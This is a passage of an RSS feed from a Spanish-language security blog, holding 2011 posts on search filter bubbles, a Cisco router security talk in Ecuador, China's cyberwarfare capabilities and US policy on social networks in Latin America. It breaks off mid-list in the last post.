<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-8471324546808744058</atom:id><lastBuildDate>Thu, 02 Feb 2012 17:08:37 +0000</lastBuildDate><category>Wardialing</category><category>Wireless</category><category>MacBook</category><category>Twitter</category><category>PampaSeg</category><category>Ciberguerra</category><category>Bizarro</category><category>ekoparty</category><category>GPEN</category><category>PaintBall</category><category>Ponencias</category><category>DSP</category><category>Pivoting</category><category>CTF</category><category>Conferencias</category><category>Meterpreter</category><category>Nmap</category><category>webcasts</category><category>Mercado</category><category>Photoshop</category><category>CEH</category><category>Book Reviews</category><category>ekoparty_2010</category><category>Ninjas</category><category>Entrevistas</category><category>Publicaciones</category><category>Networking</category><category>CampusParty</category><category>Presentation</category><category>Humor</category><category>ekoparty_2008</category><category>Android</category><category>Hackerspace</category><category>Certificaciones</category><category>Pwnie</category><category>StartUp</category><category>PenTest</category><category>VMWare</category><category>Segurinfo</category><category>Anuncios</category><category>BASE4_Security</category><category>Ataques_de_Red</category><category>Running</category><category>LoadBalancer</category><category>FOO_Semanal</category><category>Pwn2Own</category><category>KungFooSion</category><category>Moviles</category><category>Wireshark</category><category>EnCase</category><category>UAV</category><category>Blogger</category><category>Maltego</category><category>Analisis_Forense</category><category>Trainings</category><category>Google</category><category>Privacidad</category><category>ekoparty_2011</category><category>DNI</category><category>COMBAT_Training</category><category>Scapy</category><category>IDS/IPS</category><category>MetaSploit</category><category>Network Forensics</category><category>Malware</category><category>CSIRT</category><category>WiFu_Training</category><category>EnCE</category><category>Workshops</category><category>BlueHat</category><category>LockPicking</category><category>Ingenieria_Social</category><category>Pass-The-Hash</category><category>TED</category><category>WAF</category><title>www.KUNGFOOSION.com</title><description>KUNGFOOSION es el Blog de Leonardo Pigñer sobre Penetration Testing, Análisis Forense y Kung-Foo!</description><link>http://www.kungfoosion.com/</link><managingEditor>noreply@blogger.com (KungFooSion)</managingEditor><generator>Blogger</generator><openSearch:totalResults>330</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/KungFooSion" /><feedburner:info uri="kungfoosion" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>KungFooSion</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7297961038385438494</guid><pubDate>Thu, 08 Dec 2011 00:22:00 +0000</pubDate><atom:updated>2011-12-16T22:21:21.091-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><title>Google: Relevancia de la Información o Censura</title><description>&lt;div style="text-align: justify;"&gt;Redes Sociales, Medios de Prensa y hasta Buscadores, hacen uso de algoritmos de relevancia para filtrar la información "que creen" nos interesa. ¿Estamos frente a un nuevo tipo de censura?&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;"Una ardilla muriendo en el frente de tu casa, puede ser mas relevante para tus intereses en este momento, que personas muriendo en Africa."&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Mark Zuckerberg, Facebook&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.rooseveltinstitute.org/people/fellows/eli-pariser"&gt;Eli Pariser&lt;/a&gt;, un reconocido activista político, dió una interesante charla en TED sobre esta problemática: &lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="233" src="http://www.youtube.com/embed/wGq3HWILr6k" width="400"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Pariser sostiene que mientras empresas en Internet se esfuerzan por adaptar sus servicios (incluyendo noticias y resultados de búsqueda) a nuestros gustos personales, surge la peligrosa consecuencia de quedar atrapados en una "burbuja de filtros", que obstaculice nuestra visión del mundo.&lt;br /&gt;
&lt;br /&gt;
Casualmente hace unas semanas, cuando &lt;a href="http://twitter.com/spamloco"&gt;Alejandro Eguía&lt;/a&gt; de &lt;a href="http://spamloco.net/"&gt;Spamloco.net&lt;/a&gt; estuvo en el &lt;a href="http://base4uni.com/combat-training.php"&gt;COMBAT Training&lt;/a&gt;, me comentaba sobre la dificultad del SEO con Google, ya que una persona sentada al lado de otra, realizando la misma búsqueda, podría obtener resultados diferentes, a causa de estos algoritmos que adaptan los resultados a nuestros gustos personales.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Pariser escribió el libro "&lt;a href="http://www.amazon.com/Filter-Bubble-What-Internet-Hiding/dp/1594203008/"&gt;The Filter Bubble: What the Internet Is Hiding from You&lt;/a&gt;", profundizando sobre este tema, y planteando la necesidad de que los buscadores informen como funcionan sus algoritmos de relevancia, o brinden la posibilidad al usuario de elejir si quiere continuar en la burbuja o no. ¿Qué opinan? &lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;  //  Seguime en Twitter: &lt;a href="http://twitter.com/#%21/@KFS"&gt;@KFS&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7297961038385438494?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/5QrkFaBwH8U" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/5QrkFaBwH8U/google-relevancia-de-la-informacion-o.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/wGq3HWILr6k/default.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/12/google-relevancia-de-la-informacion-o.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-3729942712312637912</guid><pubDate>Wed, 30 Nov 2011 17:16:00 +0000</pubDate><atom:updated>2011-12-16T22:25:29.182-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ponencias</category><title>Exitosa Primer Edición de E-Security Conferences en Ecuador</title><description>&lt;div style="text-align: justify;"&gt;Paso exitosamente la primer edición de la conferencia e-security, en la hermosa ciudad de Guayaquil, Ecuador.&lt;br /&gt;
&lt;br /&gt;
Aprovecho para felicitar nuevamente a los organizadores, &lt;a href="http://twitter.com/@HCKS_ec"&gt;Roberto Olaya&lt;/a&gt; de la empresa &lt;a href="http://www.hcks.ec/"&gt;HCK-S&lt;/a&gt;, junto a la &lt;a href="http://twitter.com/@lacamaragye"&gt;Cámara de Comercio&lt;/a&gt; de Guayaquil, por la excelente organización del evento. Un lujo para una primera edición! :)&lt;br /&gt;
&lt;br /&gt;
También fue un placer encontrarme con amigos como &lt;a href="http://twitter.com/@DragonJAR"&gt;@DragonJAR&lt;/a&gt; &lt;a href="http://twitter.com/@jcaitf"&gt;@jcaitf&lt;/a&gt; y &lt;a href="http://twitter.com/@chemaalonso"&gt;@chemaalonso&lt;/a&gt;, y haber conocido a grandes profesionales como Alvaro Andrade y Gabriel Waise. Con todos ellos armamos un grupo, que cual viaje de egresados, paseamos por todo Guayaquil.&lt;br /&gt;
&lt;br /&gt;
La siguiente foto es en el faro del cerro Santa Ana, al cual llegas luego subir 444 escalones. Afortunadamente durante todo el trayecto, hay una innumerable cantidad de bares en donde aplacar la sed ;)&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Jb5Pdjrn5Fc/TtZhTOmiU6I/AAAAAAAAF5U/c_KFeu4iQDQ/s1600/e-security_guayaquil.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="286" src="http://4.bp.blogspot.com/-Jb5Pdjrn5Fc/TtZhTOmiU6I/AAAAAAAAF5U/c_KFeu4iQDQ/s400/e-security_guayaquil.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Durante el evento, me toco dar la primer charla, la que fue retitulada por los organizadores "Defendiendo Nuestro Router Cisco" :D La idea de la charla fue crear una conciencia de seguridad sobre los routers Cisco, los que muchas veces no son tenidos en cuenta al momento de segurizar una red.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;div id="__ss_10401416" style="width: 425px;"&gt; &lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/kungfoosion/defendiendo-nuestro-router-cisco" target="_blank" title="Defendiendo Nuestro Router CISCO"&gt;Defendiendo Nuestro Router CISCO&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/10401416" width="425"&gt;&lt;/iframe&gt; &lt;div style="padding: 5px 0 12px;"&gt; View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/kungfoosion" target="_blank"&gt;Leonardo Pigñer&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Mas haya de mostrar los clásicos errores de configuración, contraseñas por default, y puertas traseras con GRE y TCL, me parece que lo más interesante fue presentar estadísticas reales en Ecuador. Para ello estuve alrededor de 2 semanas escaneando todas las redes IPv4 de Ecuador por SNMP default, de cuyos resultados extraje las versiones de IOS utilizadas.&lt;br /&gt;
&lt;br /&gt;
Como podrán ver en los slides, de los 1.212 routers Cisco con SNMP default que encontré en Ecuador, el IOS más utilizado es la versión 12.2 que ya no posee mantenimiento por Cisco. w00t!&lt;br /&gt;
&lt;br /&gt;
También es muy interesante el resto de dispositivos con SNMP default encontrados en todas las redes de Ecuador. Durante la charla, solamente presente los resultados de Cisco, porque ese era el propósito, pero voy a preparar las estadísticas del total de los resultados, y los postearé en este blog dentro de poco.&lt;br /&gt;
&lt;br /&gt;
Luego de que agregue algunas features, y haga el código un poco más bello, también voy a publicar los scripts que arme para esta presentación.&lt;br /&gt;
&lt;br /&gt;
Un gran abrazo para todos los amigos de Ecuador! &lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;  //  Seguime en Twitter: &lt;a href="http://twitter.com/#%21/@KFS"&gt;@KFS&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-3729942712312637912?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/mKJKCRrA-ec" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/mKJKCRrA-ec/exitosa-primer-edicion-de-e-security.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Jb5Pdjrn5Fc/TtZhTOmiU6I/AAAAAAAAF5U/c_KFeu4iQDQ/s72-c/e-security_guayaquil.JPG" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/11/exitosa-primer-edicion-de-e-security.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-8206030109206158449</guid><pubDate>Sat, 12 Nov 2011 02:57:00 +0000</pubDate><atom:updated>2011-11-12T00:01:50.238-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ciberguerra</category><title>CHINA, ¿Realmente una Ciberpotencia?</title><description>&lt;div style="text-align: justify;"&gt;Periódicamente escuchamos sobre ciberataques realizados por China a otras naciones, pero un &lt;a href="http://www.securitychallenges.org.au/ArticlePDFs/vol7no2Ball.pdf"&gt;reciente estudio&lt;/a&gt; sugiere que las capacidades de ciberguerra de China están décadas por detrás de otros países.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-L3w-I6vg908/Tr3fP2roPQI/AAAAAAAAF4g/jIDuw8JLpHs/s1600/china-hacker-army.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="265" src="http://4.bp.blogspot.com/-L3w-I6vg908/Tr3fP2roPQI/AAAAAAAAF4g/jIDuw8JLpHs/s400/china-hacker-army.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Según el &lt;a href="http://www.securitychallenges.org.au/ArticlePDFs/vol7no2Ball.pdf"&gt;análisis de Desmond Ball&lt;/a&gt;, profesor del Centro de Estudios Estratégicos y de Defensa, de la Universidad Nacional de Australia, las capacidades de ciberguerra de China son bastante rudimentarias. &lt;br /&gt;
&lt;br /&gt;
Basándose en publicaciones existentes, el informe hace un detallado análisis de todos los supuestos ciberataques realizados por China, en los que si bien se evidencia cierta sofisticación, están muy lejos de obras de ingeniería, con millones de dólares de inversión, como Stuxnet.&lt;br /&gt;
&lt;br /&gt;
¿Por qué entonces se habla tanto de China como nueva Ciberpotencia? Todos recordamos la Operación Aurora, y las nuevas 3 letras de moda surgidas tras los ataques chinos: APT (Advanced Persistent Threat).&lt;br /&gt;
&lt;br /&gt;
Por un lado, es cierto que los ataques provenientes de China aumentaron exponencialmente. Hace solo unos días, se presento un reporte al Congreso de los EEUU llamado "&lt;a href="http://www.dni.gov/reports/20111103_report_fecie.pdf"&gt;Foreign Spies Stealing US Economic Secrets in Cyberspace&lt;/a&gt;", en donde se acusa a actores de China y servicios de inteligencia de Rusia, de exfiltrar información confidencial de empresas de tecnología, contratistas de defensa, empresas químicas, agroindustriales, etc.&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pero en el caso de China, los cientos de exitosos ataques que diariamente logran exfiltrar terabytes de información de empresas de EEUU y Europa Occidental, no necesariamente significa que tengan un nivel de sofisticación como el de Stuxnet, que hoy en día es el parámetro más alto que tenemos, sino que como toda amenaza persistente avanzada, eventualmente tendrá éxito.&lt;br /&gt;
&lt;br /&gt;
También es difícil medir el poder de ciberguerra de China, ya que no todos los ataques son orquestados por el gobierno, o por el departamento de ciberguerra del "Ejército de Liberación del Pueblo", sino que también hay una gran cantidad de "hackers patrióticos" que actúan por su cuenta.&lt;br /&gt;
&lt;br /&gt;
Si como indica el análisis de Desmond Ball, las capacidades de ciberguerra de China son bastante rudimentarias, seguramente tendremos oportunidad de verlo en el futuro, mientras tanto es innegable que China se convirtió en uno de los actores principales en lo que respecta al ciberespionaje con fines económicos.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;REFERENCIAS:&lt;/b&gt;&lt;br /&gt;
- &lt;a href="http://www.securitychallenges.org.au/ArticlePDFs/vol7no2Ball.pdf"&gt;China’s Cyber Warfare Capabilities&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.dni.gov/reports/20111103_report_fecie.pdf"&gt;Foreign Spies Stealing US Economic Secrets in Cyberspace&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.chinadaily.com.cn/cndy/2011-08/18/content_13138188.htm"&gt;Is China really 'Cyberdragon's?&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;  //  Seguime en Twitter: &lt;a href="http://twitter.com/#%21/@KFS"&gt;@KFS&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-8206030109206158449?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/xoa8O_n9IWY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/xoa8O_n9IWY/china-realmente-una-ciberpotencia.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-L3w-I6vg908/Tr3fP2roPQI/AAAAAAAAF4g/jIDuw8JLpHs/s72-c/china-hacker-army.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/11/china-realmente-una-ciberpotencia.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7725871416471292832</guid><pubDate>Thu, 03 Nov 2011 17:12:00 +0000</pubDate><atom:updated>2011-11-03T14:12:07.641-03:00</atom:updated><title>Ya llega e-security conferences en Ecuador</title><description>&lt;div style="text-align: justify;"&gt;Llega la primer edición de &lt;b&gt;"e-security conferences: descifrando el código hacker"&lt;/b&gt;, del 25 al 27 de Noviembre, en la hermosa ciudad de Guayaquil, Ecuador.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El evento esta organizado por HCKS Security, la Cámara de Comercio de Guayaquil y la ESPOL, a quienes agradezco por haberme invitado a participar :)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.lacamara.org/website/index.php?option=com_content&amp;amp;view=article&amp;amp;id=573:e-security&amp;amp;catid=57:actividades-de-la-camara&amp;amp;Itemid=82"&gt;&lt;br /&gt;
&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-2rvLWG_HoPA/TrK3pB-qZPI/AAAAAAAAF34/9EtcHxptZgE/s400/esecsociosACT_01-11.jpg" width="303" /&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Pueden seguir todas las novedades de la conferencia a través del Twitter oficial del evento: &lt;a href="https://twitter.com/#%21/e_security2011"&gt;@e-security2011&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Nos vemos en Guayaquil del 25 al 27 de Noviembre! &lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;  //  Seguime en Twitter: &lt;a href="http://twitter.com/#%21/@KFS"&gt;@KFS&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7725871416471292832?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/Ftrf-JjVU7s" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/Ftrf-JjVU7s/ya-llega-e-security-conferences-en.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-2rvLWG_HoPA/TrK3pB-qZPI/AAAAAAAAF34/9EtcHxptZgE/s72-c/esecsociosACT_01-11.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/11/ya-llega-e-security-conferences-en.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-2537232728172637273</guid><pubDate>Mon, 31 Oct 2011 20:17:00 +0000</pubDate><atom:updated>2011-11-12T00:01:50.239-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ciberguerra</category><title>¿Redes Sociales para Ciberpropaganda en Latinoamérica?</title><description>&lt;div style="text-align: justify;"&gt;Un reciente &lt;a href="http://www.washingtonpost.com/wp-srv/national/documents/meacham-report.html"&gt;informe&lt;/a&gt; del Comité de Relaciones Exteriores del Senado de EEUU, plantea la necesidad de impulsar el crecimiento de las Redes Sociales en Latinoamérica.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/--uiVwYf3ybg/Tq8AEPV40LI/AAAAAAAAF3I/3zqo62rwZB8/s1600/arab_facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="266" src="http://1.bp.blogspot.com/--uiVwYf3ybg/Tq8AEPV40LI/AAAAAAAAF3I/3zqo62rwZB8/s400/arab_facebook.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;El informe plantea la importancia de las Redes Sociales en la actualidad, resaltando los hechos de la "Primavera Arabe", donde miles de ciudadanos usaron Facebook, Twitter y Google para acelerar cambios políticos en países de Medio Oriente. También habla de desafíos similares que enfrentaría Latinoamérica, citando como ejemplo de "casos extremos" a Venezuela, Cuba y Nicaragua.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;ESTADISTICAS&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;El documento posee gran cantidad de estadísticas sobre la utilización de Internet y Redes Sociales en Latinoamérica, aquí algunas:&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Latinoamérica podría superar a los EEUU en la utilización de Redes Sociales debido al crecimiento de la telefonía móvil con acceso a internet.&lt;/li&gt;
&lt;li&gt;El 82% de los latinoamericanos que tienen Internet utilizan Redes Sociales, convirtiéndolos en la segunda población más activa después de los EEUU.&lt;/li&gt;
&lt;li&gt;Facebook tiene 100 millones de usuarios en Latinoamérica, siendo los 5 países con más usuarios: Brasil, Méjico, Colombia, Argentina y Venezuela.&lt;/li&gt;
&lt;li&gt;Brasil tiene 25 millones de usuarios de Facebook, mientras que la red social Orkut de Google, que nunca fue popular en EEUU, es la más popular en Brasil con 46 millones de usuarios.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Latinoamérica posee una tasa de penetración de telefonía móvil del 90%. El siguiente gráfico, expone la cantidad de móviles por cada 100 personas:&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-LNiuoh_pkDE/Tq79suXJC-I/AAAAAAAAF24/FP2ucRKR-HI/s1600/latam_mobile_suscriptions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://2.bp.blogspot.com/-LNiuoh_pkDE/Tq79suXJC-I/AAAAAAAAF24/FP2ucRKR-HI/s400/latam_mobile_suscriptions.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Se puede apreciar varios países de Latinoamérica, incluyendo a Panamá, Argentina, Honduras y Uruguay, que tienen más de un móvil cada 100 personas, mientras que los EEUU llegan a 97 móviles cada 100 personas.&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Para el 2014, el acceso a conexiones de Banda Ancha podría exceder el 30%, mientras que en la actualidad, el acceso cada 100 personas, es el siguiente:&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3-0XezAPWeY/Tq7-bzBqrII/AAAAAAAAF3A/Wc5XW1CfWvM/s1600/latam_broadband_suscriptions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://1.bp.blogspot.com/-3-0XezAPWeY/Tq7-bzBqrII/AAAAAAAAF3A/Wc5XW1CfWvM/s400/latam_broadband_suscriptions.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;El acceso a Banda Ancha en Latinoamérica es bastante bajo si lo comparamos al de telefonía móvil. Mientras que también esta bastante por detrás de EEUU, que posee 28 suscripciones de Banda Ancha cada 100 personas.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;RECOMENDACIONES&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
Luego de plantear el estado de situación tecnológica en Latinoamérica, el documento continúa con algunas recomendaciones para que los EEUU pueda expandir las Redes Sociales en Latinoamérica, con el objetivo de difundir sus principios democráticos:&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Implementar programas de capacitación y alfabetización tecnológica.&lt;/li&gt;
&lt;li&gt;Proveer soporte para que los desarrolladores locales puedan crear&amp;nbsp; contenidos en su propio idioma.&lt;/li&gt;
&lt;li&gt;Generar contenidos que requieran poca infraestructura tecnológica o ancho de banda.&lt;/li&gt;
&lt;li&gt;Evaluar los usos negativos que se les podría dar a estas tecnologías, como fines antidemocráticos.&lt;/li&gt;
&lt;li&gt;Evaluar las preocupaciones de miembros de la industria, respecto a la&amp;nbsp; privacidad de sus usuarios, y que demasiada interferencia del gobierno pueda afectar sus negocios.&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Algunos medios de prensa norteamericanos, cuestionan que sea posible invertir en políticas de capacitación y desarrollo de infraestructura tecnológica en Latinoamérica, cuando actualmente los EEUU se encuentra viviendo una crisis tan importante.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;CONCLUSION&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
La conclusión del documento es por demás interesante, principalmente porque plantea los profundos cuestionamientos de la industria de la tecnología hacia el gobierno, en relación a estar asociados para influir en cambios políticos. Cita por ejemplo, los siguientes ejemplos:&lt;/div&gt;&lt;br /&gt;
&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Muchas de las empresas detrás de las Redes Sociales, se ven a si mismas como "startups", aún cuando sus acciones en la bolsa, puedan costar cientos de millones de dólares. Por esta razón, no poseen personal en países extranjeros para manejar las relaciones con gobiernos y ciudadanos.&lt;/li&gt;
&lt;li&gt;La industria posee una perspectiva de "neutralidad política", por lo que no desea estar asociado al gobierno, como otra herramienta de su política exterior, ya que esto podría ir en detrimento de sus negocios internacionales.&lt;/li&gt;
&lt;li&gt;La actitud dominante de la industria de la tecnología con respecto al gobierno no es buena. Un anónimo de esta industria que fue entrevistado, decía lo siguiente: "Consideramos al gobierno como un mal necesario, de la misma forma en que la gente mira a los policías de tráfico. Si te detienen por exceso de velocidad, debés pagar la multa."&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;TEORIAS CONSPIRATIVAS&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
Para quienes gustan de las teorías conspirativas, les recomiendo este video de Russia Today donde hablan de la reciente utilización de las Redes Sociales en la "Primavera Arabe" de Libia:&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/zxlixI6jJEs" width="420"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Según Russia Today, solo el 5% de los ciudadanos libios tienen acceso a Internet, con una cantidad de usuarios de Twitter tan pequeña que era imposible de calcular. Hasta Febrero de este año, cuando hubo un resurgimiento de una gran cantidad de usuarios de Twitter, y todos&amp;nbsp; pidiendo por la intervención extranjera en su país.&lt;br /&gt;
&lt;br /&gt;
Dos artículos de los diarios &lt;a href="http://www.dailymail.co.uk/news/article-1367535/U-S-military-using-fake-online-profiles-spread-propaganda.html"&gt;Daily Mail&lt;/a&gt; y &lt;a href="http://www.guardian.co.uk/technology/2011/mar/17/us-spy-operation-social-networks"&gt;The Guardian&lt;/a&gt; de Inglaterra, comentan que el Ejército de los EEUU (U.S. Central Command) le dió un contrato por 2,8M USD a una nueva empresa de Los Angeles, California llamada Ntrepid, para que desarrolle un software que permita crear identidades falsas en Redes Sociales.&lt;br /&gt;
&lt;br /&gt;
Algunas de las características de este software son las siguientes:&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;No operará en inglés, por que iría en contra de las leyes de EEUU, por lo que sólo funcionará en Arabe, Farsi y Urdu.&lt;/li&gt;
